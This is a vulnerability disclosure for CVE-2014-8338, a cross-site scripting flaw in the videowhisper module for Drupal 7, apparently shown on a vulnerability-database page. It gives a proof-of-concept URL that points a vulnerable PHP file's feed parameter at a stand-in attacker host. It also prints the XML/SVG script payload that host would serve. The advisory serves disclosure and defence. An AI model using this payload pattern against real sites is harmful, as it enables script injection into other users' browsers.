Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31450
HistoryDec 01, 2014 - 12:00 a.m.

[CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper

2014-12-0100:00:00
vulners.com
114
JSON

Hello,

Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.

Vendor Notification: 22, Oct 2014

Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php

POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt

The content of xss.txt:
<root>
<script xmlns="http://www.w3.org/2000/svg&quot;&gt;&lt;![CDATA[
alert('XSS');
]]></script>
</root>

Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.

Best regards

JSON